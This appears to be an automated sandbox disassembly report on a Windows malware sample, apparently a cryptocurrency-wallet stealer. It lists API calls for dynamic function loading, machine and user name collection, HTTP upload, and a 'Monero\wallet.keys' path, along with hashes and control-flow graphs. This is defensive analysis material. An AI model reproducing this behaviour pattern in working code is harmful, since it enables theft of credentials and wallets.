                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C3479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: eb13b85ba5c52abd038b3cbd3395eb09971132151a52a293c81d63aa79ce3c4f
                                    • Instruction ID: 4e42a437e963440ed59526840bc00e574919bb5669f9dfdd565e00df866d714e
                                    • Opcode Fuzzy Hash: eb13b85ba5c52abd038b3cbd3395eb09971132151a52a293c81d63aa79ce3c4f
                                    • Instruction Fuzzy Hash: 024138687C360C7BCE28FBA4A85ED9D7763FF42716F405868FC009A280CBB0558C5D29

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 c34880-c34942 call c4a7a0 call c347b0 call c4a740 * 5 InternetOpenA StrCmpCA 816 c34944 801->816 817 c3494b-c3494f 801->817 816->817 818 c34955-c34acd call c48b60 call c4a920 call c4a8a0 call c4a800 * 2 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a920 call c4a8a0 call c4a800 * 2 InternetConnectA 817->818 819 c34ecb-c34ef3 InternetCloseHandle call c4aad0 call c39ac0 817->819 818->819 905 c34ad3-c34ad7 818->905 829 c34f32-c34fa2 call c48990 * 2 call c4a7a0 call c4a800 * 8 819->829 830 c34ef5-c34f2d call c4a820 call c4a9b0 call c4a8a0 call c4a800 819->830 830->829 906 c34ae5 905->906 907 c34ad9-c34ae3 905->907 908 c34aef-c34b22 HttpOpenRequestA 906->908 907->908 909 c34b28-c34e28 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a9b0 call c4a8a0 call c4a800 call c4a920 call c4a8a0 call c4a800 call c4a740 call c4a920 * 2 call c4a8a0 call c4a800 * 2 call c4aad0 lstrlen call c4aad0 * 2 lstrlen call c4aad0 HttpSendRequestA 908->909 910 c34ebe-c34ec5 InternetCloseHandle 908->910 1021 c34e32-c34e5c InternetReadFile 909->1021 910->819 1022 c34e67-c34eb9 InternetCloseHandle call c4a800 1021->1022 1023 c34e5e-c34e65 1021->1023 1022->910 1023->1022 1024 c34e69-c34ea7 call c4a9b0 call c4a8a0 call c4a800 1023->1024 1024->1021
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C34915
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C3493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C34ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C50DDB,00000000,?,?,00000000,?,",00000000,?,019DE4D0), ref: 00C34DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C34E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C34E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C34E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00C34EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00C34EC5
                                    • HttpOpenRequestA.WININET(00000000,019DE520,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C34B15
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00C34ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                    • Instruction ID: 422e796f6253694162592d319c489ffa0b60509184ce27af1805af65e2b0661b
                                    • Opcode Fuzzy Hash: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                    • Instruction Fuzzy Hash: D412ED72950218AAEB15EB90DC92FEEB778FF54300F5041A9B50672091EF702F89DF66
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                    • Instruction ID: 035164f214b34f763c814380577159b0e81387c7b31a79c211f50a29fc37ad4d
                                    • Opcode Fuzzy Hash: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                    • Instruction Fuzzy Hash: E101A9B1A04204EFD704DF95DD49BAEBBB8F744B11F104269F955F3380D37459448BA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                    • Instruction ID: 9ce8ac900d02d2978bb934eb55fb7ecf49834642ff18445beec39de60eefcc94
                                    • Opcode Fuzzy Hash: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                    • Instruction Fuzzy Hash: 9AF04FB1944208AFD714DF99DD4AFAEBBB8FB44711F10026AFA05A2680C77415448BA2
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                    • Instruction ID: fa1f65954886638f3372c828b1a3f412262ef9978e05604369d9d6423aecacd3
                                    • Opcode Fuzzy Hash: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                    • Instruction Fuzzy Hash: BCD05E7490030CDFCB04DFE1D8496EDBB78FB48312F040565DD0972340EA3054C6CAA6

Control-flow Graph (node list exported from the rendered graph; the executed / not-executed colouring of the image is not preserved). Each entry is `node-id start-end [APIs called in the block]`, followed by `src->dst` edges:

                                    control_flow_graph 633 c49c10-c49c1a 634 c4a036-c4a0ca LoadLibraryA * 8 633->634 635 c49c20-c4a031 GetProcAddress * 43 633->635 636 c4a146-c4a14d 634->636 637 c4a0cc-c4a141 GetProcAddress * 5 634->637 635->634 638 c4a216-c4a21d 636->638 639 c4a153-c4a211 GetProcAddress * 8 636->639 637->636 640 c4a21f-c4a293 GetProcAddress * 5 638->640 641 c4a298-c4a29f 638->641 639->638 640->641 642 c4a2a5-c4a332 GetProcAddress * 6 641->642 643 c4a337-c4a33e 641->643 642->643 644 c4a344-c4a41a GetProcAddress * 9 643->644 645 c4a41f-c4a426 643->645 644->645 646 c4a4a2-c4a4a9 645->646 647 c4a428-c4a49d GetProcAddress * 5 645->647 648 c4a4dc-c4a4e3 646->648 649 c4a4ab-c4a4d7 GetProcAddress * 2 646->649 647->646 650 c4a515-c4a51c 648->650 651 c4a4e5-c4a510 GetProcAddress * 2 648->651 649->648 652 c4a612-c4a619 650->652 653 c4a522-c4a60d GetProcAddress * 10 650->653 651->650 654 c4a67d-c4a684 652->654 655 c4a61b-c4a678 GetProcAddress * 4 652->655 653->652 656 c4a686-c4a699 GetProcAddress 654->656 657 c4a69e-c4a6a5 654->657 655->654 656->657 658 c4a6a7-c4a703 GetProcAddress * 4 657->658 659 c4a708-c4a709 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,019C6980), ref: 00C49C2D
                                    • GetProcAddress.KERNEL32(75900000,019C69A0), ref: 00C49C45
                                    • GetProcAddress.KERNEL32(75900000,019D8E98), ref: 00C49C5E
                                    • GetProcAddress.KERNEL32(75900000,019D8C10), ref: 00C49C76
                                    • GetProcAddress.KERNEL32(75900000,019DCD80), ref: 00C49C8E
                                    • GetProcAddress.KERNEL32(75900000,019DCBE8), ref: 00C49CA7
                                    • GetProcAddress.KERNEL32(75900000,019CAFA0), ref: 00C49CBF
                                    • GetProcAddress.KERNEL32(75900000,019DCC18), ref: 00C49CD7
                                    • GetProcAddress.KERNEL32(75900000,019DCD50), ref: 00C49CF0
                                    • GetProcAddress.KERNEL32(75900000,019DCCD8), ref: 00C49D08
                                    • GetProcAddress.KERNEL32(75900000,019DCB28), ref: 00C49D20
                                    • GetProcAddress.KERNEL32(75900000,019C6780), ref: 00C49D39
                                    • GetProcAddress.KERNEL32(75900000,019C69C0), ref: 00C49D51
                                    • GetProcAddress.KERNEL32(75900000,019C6700), ref: 00C49D69
                                    • GetProcAddress.KERNEL32(75900000,019C6720), ref: 00C49D82
                                    • GetProcAddress.KERNEL32(75900000,019DCB58), ref: 00C49D9A
                                    • GetProcAddress.KERNEL32(75900000,019DCD38), ref: 00C49DB2
                                    • GetProcAddress.KERNEL32(75900000,019CAF28), ref: 00C49DCB
                                    • GetProcAddress.KERNEL32(75900000,019C67A0), ref: 00C49DE3
                                    • GetProcAddress.KERNEL32(75900000,019DCDC8), ref: 00C49DFB
                                    • GetProcAddress.KERNEL32(75900000,019DCDE0), ref: 00C49E14
                                    • GetProcAddress.KERNEL32(75900000,019DCD08), ref: 00C49E2C
                                    • GetProcAddress.KERNEL32(75900000,019DCDF8), ref: 00C49E44
                                    • GetProcAddress.KERNEL32(75900000,019C67C0), ref: 00C49E5D
                                    • GetProcAddress.KERNEL32(75900000,019DCD68), ref: 00C49E75
                                    • GetProcAddress.KERNEL32(75900000,019DCBD0), ref: 00C49E8D
                                    • GetProcAddress.KERNEL32(75900000,019DCCF0), ref: 00C49EA6
                                    • GetProcAddress.KERNEL32(75900000,019DCB10), ref: 00C49EBE
                                    • GetProcAddress.KERNEL32(75900000,019DCB70), ref: 00C49ED6
                                    • GetProcAddress.KERNEL32(75900000,019DCBA0), ref: 00C49EEF
                                    • GetProcAddress.KERNEL32(75900000,019DCD98), ref: 00C49F07
                                    • GetProcAddress.KERNEL32(75900000,019DCB88), ref: 00C49F1F
                                    • GetProcAddress.KERNEL32(75900000,019DCBB8), ref: 00C49F38
                                    • GetProcAddress.KERNEL32(75900000,019D9DB8), ref: 00C49F50
                                    • GetProcAddress.KERNEL32(75900000,019DCD20), ref: 00C49F68
                                    • GetProcAddress.KERNEL32(75900000,019DCB40), ref: 00C49F81
                                    • GetProcAddress.KERNEL32(75900000,019C68E0), ref: 00C49F99
                                    • GetProcAddress.KERNEL32(75900000,019DCDB0), ref: 00C49FB1
                                    • GetProcAddress.KERNEL32(75900000,019C6860), ref: 00C49FCA
                                    • GetProcAddress.KERNEL32(75900000,019DCC00), ref: 00C49FE2
                                    • GetProcAddress.KERNEL32(75900000,019DCC30), ref: 00C49FFA
                                    • GetProcAddress.KERNEL32(75900000,019C62C0), ref: 00C4A013
                                    • GetProcAddress.KERNEL32(75900000,019C6580), ref: 00C4A02B
